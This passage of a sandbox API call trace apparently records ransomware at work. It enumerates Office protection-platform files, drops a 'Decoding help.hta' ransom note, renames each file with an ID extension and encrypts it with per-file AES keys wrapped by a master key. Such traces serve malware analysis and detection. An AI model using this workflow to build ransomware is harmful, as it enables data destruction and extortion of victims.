dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 291 os_tid = 0x358 [0042.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x146dfd30 | out: lpFindFileData=0x146dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db578 [0042.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.334] FindNextFileW (in: hFindFile=0x5db578, lpFindFileData=0x146dfd30 | out: lpFindFileData=0x146dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.334] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.334] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.335] FindNextFileW (in: hFindFile=0x5db578, lpFindFileData=0x146dfd30 | out: lpFindFileData=0x146dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x24500, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSPPC.DLL", cAlternateFileName="")) returned 1 [0042.335] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0042.335] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0042.335] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0042.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0xffffffff [0042.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e0 [0042.378] WriteFile (in: hFile=0x5e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x146dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.379] CloseHandle (hObject=0x5e0) returned 1 [0042.379] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.379] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OSPPC.DLL") returned -1 [0042.379] lstrlenW (lpString="OSPPC.DLL") returned 9 [0042.379] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0042.379] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0042.379] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="OSPPC.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" [0042.379] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" [0042.379] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e0 [0042.380] CreateFileMappingA (hFile=0x5e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5e4 [0042.380] CryptAcquireContextA (in: phProv=0x146dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x146dfcec*=0x3448588) returned 1 [0042.381] CryptGenKey (in: hProv=0x3448588, Algid=0x6610, dwFlags=0x1, phKey=0x146dfce8 | out: phKey=0x146dfce8*=0x5db738) returned 1 [0042.381] CryptExportKey (in: hKey=0x5db738, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x146dfbe4, pdwDataLen=0x146dfce4 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfce4*=0x2c) returned 1 [0042.381] MapViewOfFile (hFileMappingObject=0x5e4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24500) returned 0x550000 [0044.047] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x146dfbe4*, pdwDataLen=0x146dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfcf8*=0x100) returned 1 [0046.391] CryptEncrypt (in: hKey=0x5db738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x146dfce4*=0x24500, dwBufLen=0x24500 | out: pbData=0x550000*, pdwDataLen=0x146dfce4*=0x24500) returned 1 [0046.558] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0046.561] CloseHandle (hObject=0x5e4) returned 1 [0046.561] CryptDestroyKey (hKey=0x5db738) returned 1 [0046.561] CryptReleaseContext (hProv=0x3448588, dwFlags=0x0) returned 1 [0046.561] SetFilePointerEx (in: hFile=0x5e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.561] WriteFile (in: hFile=0x5e0, lpBuffer=0x146dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x146dfbe4*, lpNumberOfBytesWritten=0x146dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.562] WriteFile (in: hFile=0x5e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x146dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.562] CloseHandle (hObject=0x5e0) returned 1 [0046.564] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.564] FindNextFileW (in: hFindFile=0x5db578, lpFindFileData=0x146dfd30 | out: lpFindFileData=0x146dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59922e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x1be700, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSPPCEXT.DLL", cAlternateFileName="")) returned 1 [0046.564] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0046.564] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0046.564] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0046.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0x1 [0046.564] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OSPPCEXT.DLL") returned -1 [0046.564] lstrlenW (lpString="OSPPCEXT.DLL") returned 12 [0046.564] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0046.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0046.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="OSPPCEXT.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" [0046.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" [0046.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0046.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e0 [0046.567] CreateFileMappingA (hFile=0x5e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5e4 [0046.567] CryptAcquireContextA (in: phProv=0x146dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x146dfcec*=0x3448588) returned 1 [0046.567] CryptGenKey (in: hProv=0x3448588, Algid=0x6610, dwFlags=0x1, phKey=0x146dfce8 | out: phKey=0x146dfce8*=0x5db778) returned 1 [0046.567] CryptExportKey (in: hKey=0x5db778, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x146dfbe4, pdwDataLen=0x146dfce4 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfce4*=0x2c) returned 1 [0046.567] MapViewOfFile (hFileMappingObject=0x5e4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xcb90000 [0046.646] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x146dfbe4*, pdwDataLen=0x146dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfcf8*=0x100) returned 1 [0046.646] CryptEncrypt (in: hKey=0x5db778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xcb90000, pdwDataLen=0x146dfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xcb90000*, pdwDataLen=0x146dfce4*=0x100000) returned 1 [0049.516] UnmapViewOfFile (lpBaseAddress=0xcb90000) returned 1 [0049.598] CloseHandle (hObject=0x5e4) returned 1 [0049.598] CryptDestroyKey (hKey=0x5db778) returned 1 [0049.598] CryptReleaseContext (hProv=0x3448588, dwFlags=0x0) returned 1 [0049.598] SetFilePointerEx (in: hFile=0x5e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.598] WriteFile (in: hFile=0x5e0, lpBuffer=0x146dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x146dfbe4*, lpNumberOfBytesWritten=0x146dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.142] WriteFile (in: hFile=0x5e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x146dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.142] CloseHandle (hObject=0x5e0) returned 1 [0053.127] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.127] FindNextFileW (in: hFindFile=0x5db578, lpFindFileData=0x146dfd30 | out: lpFindFileData=0x146dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="osppobjs-spp-plugin-manifest-signed.xrm-ms", cAlternateFileName="OSPPOB~1.XRM")) returned 1 [0053.127] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0053.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0053.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0053.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0x1 [0053.127] lstrcmpiW (lpString1="Decoding help.hta", lpString2="osppobjs-spp-plugin-manifest-signed.xrm-ms") returned -1 [0053.128] lstrlenW (lpString="osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 42 [0053.128] lstrcmpiW (lpString1="[ID]", lpString2="m-ms") returned -1 [0053.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0053.128] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0053.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="osppobjs-spp-plugin-manifest-signed.xrm-ms" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" [0053.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" [0053.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[ID]g9uZrLhJaygpwRm1[ID]" [0053.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e0 [0053.129] CreateFileMappingA (hFile=0x5e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x750 [0053.129] CryptAcquireContextA (in: phProv=0x146dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x146dfcec*=0x34490b0) returned 1 [0054.988] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x146dfce8 | out: phKey=0x146dfce8*=0x5d7dd0) returned 1 [0054.988] CryptExportKey (in: hKey=0x5d7dd0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x146dfbe4, pdwDataLen=0x146dfce4 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfce4*=0x2c) returned 1 [0054.988] MapViewOfFile (hFileMappingObject=0x750, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2d60) returned 0x530000 [0055.002] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x146dfbe4*, pdwDataLen=0x146dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfcf8*=0x100) returned 1 [0055.002] CryptEncrypt (in: hKey=0x5d7dd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000, pdwDataLen=0x146dfce4*=0x2d60, dwBufLen=0x2d60 | out: pbData=0x530000*, pdwDataLen=0x146dfce4*=0x2d60) returned 1 [0055.002] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0055.004] CloseHandle (hObject=0x750) returned 1 [0055.004] CryptDestroyKey (hKey=0x5d7dd0) returned 1 [0055.004] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0055.004] SetFilePointerEx (in: hFile=0x5e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.005] WriteFile (in: hFile=0x5e0, lpBuffer=0x146dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x146dfbe4*, lpNumberOfBytesWritten=0x146dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.951] WriteFile (in: hFile=0x5e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x146dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x146dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.952] CloseHandle (hObject=0x5e0) returned 1 [0056.952] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.513] FindNextFileW (in: hFindFile=0x5db578, lpFindFileData=0x146dfd30 | out: lpFindFileData=0x146dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59948fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x212b00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSPPOBJS.DLL", cAlternateFileName="")) returned 1 [0058.513] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0058.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0058.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0058.513] 